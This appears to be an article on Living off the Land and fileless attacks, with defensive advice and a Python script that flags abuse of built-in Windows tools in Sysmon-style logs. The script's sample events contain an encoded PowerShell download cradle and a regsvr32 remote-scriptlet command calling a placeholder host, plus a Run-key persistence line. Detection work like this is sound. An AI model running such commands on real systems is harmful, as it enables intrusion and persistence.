Hackers nowadays are going old-school again. If you look at some of the recent hacking events, techniques and strategies that were used years ago have come back to the fore. One such concept that is gaining traction among attackers is the Living off the Land (LotL) attack.

What Are Living off the Land (LotL) Attacks?

There is no silver bullet that stops every type of cyber threat at all times. In many intrusions the threat actor does not need a hacking tool of their own; instead, they use the tools and applications already present on the victim's system to compromise it. These are called LotL attacks.

Over the past couple of years, LotL has seen a major rise in adoption. Attackers use tools that are already installed on the victim's computers (dual-use administration tools such as PowerShell, WMI and scheduled tasks) or run simple scripts and shellcode directly in memory.

Although LotL attacks often involve no custom malware binary at all, the rate of these attacks has increased significantly. The reason is that activity which blends in with legitimate administration is hard to tell apart from normal operations, so attackers gain a long dwell time, and the longer they remain unnoticed, the more opportunity they have to move laterally and steal or destroy data or disrupt operations.

A closely related subset of LotL is fileless malware. Here the attacker exploits dual-use tools and memory-only techniques, which lets them hide in plain sight among legitimate system administration work. Few or no files are written to disk during such an attack; the fewer files there are, the fewer artefacts a file-scanning security tool has to detect.

How To Fight LotL?

Being an old-school yet sophisticated way of hacking, LotL poses a great challenge for companies that need to identify and defend against it. However, there are measures companies can adopt to fight LotL and fileless malware attacks.

Software And Security Hygiene

This might sound basic, but many attacks succeed because of negligence around the software a company uses. Many organisations across the world do not bother to update or patch the software and tools they rely on, which leaves known vulnerabilities open for threat actors to exploit.

Organisations should maintain an application inventory so they can identify outdated and unpatched applications and operating systems and manage every application in the environment securely. It is also imperative to run security awareness training that goes beyond basic email phishing and covers how built-in Windows tools such as PowerShell, WMI, certutil and regsvr32 are normally used, so that staff can spot anomalies, malicious activity, or suspicious programs running in the background. The better you understand normal Windows background activity, the more likely you are to notice an attacker abusing it.

Assessment Of Events When You Were Hacked

Review previous incidents and identify the files and tools that played a major role in them. Security analysts should use their tooling and systems to reconstruct historical attacks from artefacts such as suspicious registry keys and suspicious output files, as well as to identify threats that are still active.

Once you have those affected files or other traces, find out where things went wrong and fix it so the same path cannot be used again.

Have The Right Endpoint Detection and Response (EDR)

There is something called "silent failure" when it comes to defending against cyber-attacks. Silent failure is when your dedicated security defences fail to detect or block an attack and do not even notify you that they have failed. If fileless malware slips through and gains access to your environment, it may dwell in your systems for a long time and analyse them in preparation for a bigger attack.

To overcome this, it is important to have the right Endpoint Detection and Response (EDR) tooling. Because EDR watches process, script and memory behaviour on the endpoint rather than only scanning files, it helps companies find suspicious activity at the endpoints and eliminate it.

Know About Access Rights And Privileges

The emphasis on this point is real. An organisation should have clear policies on the access rights and privileges of employees. For example, when an employee clicks a malicious link, that employee's workstation is often not the attacker's real target; with over-broad privileges and a flat network, the attacker moves across the network to a richer target. Therefore segment the network, apply least privilege, and make sure third-party applications and users are held to strict access controls.

Have A Dedicated Threat Hunting Strategy

The chances of finding threats are higher when different teams look for different kinds of threats. It is therefore good practice for companies to have dedicated threat hunters who continuously go through the different segments of the company's IT infrastructure looking for the faint signs of the most sophisticated attacks.

Companies can either build an in-house threat hunting team or outsource to a managed threat hunting service. Both work well, as they are tailor-made to fill this critical gap for organisations of all types.
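The anomaly spotting that the hygiene section asks staff to learn, the review of suspicious registry keys in the assessment section, and the hunting described above all come down to recognising abuse of built-in Windows tools in endpoint telemetry. The following Python script is an added example written for this article, not code from the original post or from any vendor: it parses constructed, simplified Sysmon-style process-creation (Event ID 1) and registry-value (Event ID 13) lines and flags common LotL indicators such as Office spawning a script host, encoded PowerShell with a download cradle, regsvr32 loading a remote scriptlet, and Run-key persistence. The sample lines, the 198.51.100.7 documentation address and the finding names are all invented for the illustration; real Sysmon output is XML with different field layout, and the patterns are a starting point for hunting, not a complete rule set.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Built-in Windows binaries routinely abused in LotL intrusions (lower-case basenames).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# PowerShell download-cradle vocabulary; matched on whole words to limit false positives.
CRADLE_RE = re.compile(r"\b(iex|invoke-expression|downloadstring|downloadfile|net\.webclient|"
                       r"invoke-webrequest|frombase64string)\b")

@dataclass
class Event:
    fields: Dict[str, str]
    findings: List[str] = field(default_factory=list)

def parse_event(line: str) -> Event:
    """Parse one Key=Value line (quoted values may contain spaces) into an Event."""
    pairs = re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', line)
    return Event({key: quoted if quoted else bare for key, quoted, bare in pairs})

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmd: str) -> str:
    """Return the script hidden behind powershell -enc/-e/-ec/-EncodedCommand, or ''."""
    m = re.search(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", cmd, re.IGNORECASE)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")   # PowerShell encodes as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return ""

def analyse(event: Event) -> Event:
    """Attach a finding name for each LotL indicator the event matches."""
    f = event.fields
    if f.get("EventID") == "1":                      # Sysmon 1: process creation
        image, parent = basename(f.get("Image", "")), basename(f.get("ParentImage", ""))
        cmd = f.get("CommandLine", "")
        lowered = cmd.lower()
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            event.findings.append("office-spawns-script-host")
        decoded = decode_encoded_command(cmd)
        if decoded:
            event.findings.append("powershell-encoded-command")
            lowered += " " + decoded.lower()         # inspect the decoded payload as well
        if image in ("powershell.exe", "pwsh.exe") and CRADLE_RE.search(lowered):
            event.findings.append("powershell-download-cradle")
        if image == "regsvr32.exe" and re.search(r"/i:https?://", lowered):
            event.findings.append("regsvr32-remote-scriptlet")
        if image == "mshta.exe" and re.search(r"https?://|javascript:|vbscript:", lowered):
            event.findings.append("mshta-remote-content")
        if image == "rundll32.exe" and "javascript:" in lowered:
            event.findings.append("rundll32-javascript")
        if image == "certutil.exe" and ("-urlcache" in lowered or "-decode" in lowered):
            event.findings.append("certutil-download-or-decode")
    elif f.get("EventID") == "13":                   # Sysmon 13: registry value set
        target = f.get("TargetObject", "").lower()
        details = f.get("Details", "").lower()
        if "\\currentversion\\run" in target and any(h in details for h in SCRIPT_HOSTS):
            event.findings.append("run-key-script-persistence")
    return event

def hunt(lines: List[str]) -> List[Event]:
    return [analyse(parse_event(line)) for line in lines]

def build_sample_events() -> List[str]:
    """Constructed, simplified Sysmon-style lines for this example; not real telemetry."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage1')"
    enc = base64.b64encode(cradle.encode("utf-16le")).decode()
    return [
        # 1. Benign: an admin runs an inventory script from a console (must not fire).
        'EventID=1 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
        'ParentImage="C:\\Windows\\explorer.exe" '
        'CommandLine="powershell.exe -File C:\\Scripts\\Get-Inventory.ps1"',
        # 2. Macro document spawning hidden, encoded PowerShell with a download cradle.
        'EventID=1 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
        'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
        f'CommandLine="powershell.exe -nop -w hidden -enc {enc}"',
        # 3. regsvr32 pulling a remote scriptlet: nothing written to disk, a signed binary does the work.
        'EventID=1 Image="C:\\Windows\\System32\\regsvr32.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" '
        'CommandLine="regsvr32 /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"',
        # 4. Persistence: a Run key pointing at a hidden PowerShell script.
        'EventID=13 Image="C:\\Windows\\System32\\reg.exe" '
        'TargetObject="HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater" '
        'Details="powershell.exe -w hidden -File C:\\Users\\Public\\up.ps1"',
    ]

if __name__ == "__main__":
    for i, ev in enumerate(hunt(build_sample_events()), 1):
        print(f"event {i}: {', '.join(ev.findings) or 'no LotL indicators'}")
```

The benign first event produces no finding, which is the point of checking parent process, decoded payload and command-line context together rather than alerting on every PowerShell launch; an administrator's signed script from an interactive console looks nothing like a hidden, encoded cradle spawned by WINWORD.EXE. In a real deployment the same checks would run against the EDR or Sysmon feed, and the hunter would tune the word lists to the organisation's own baseline of legitimate administrative use.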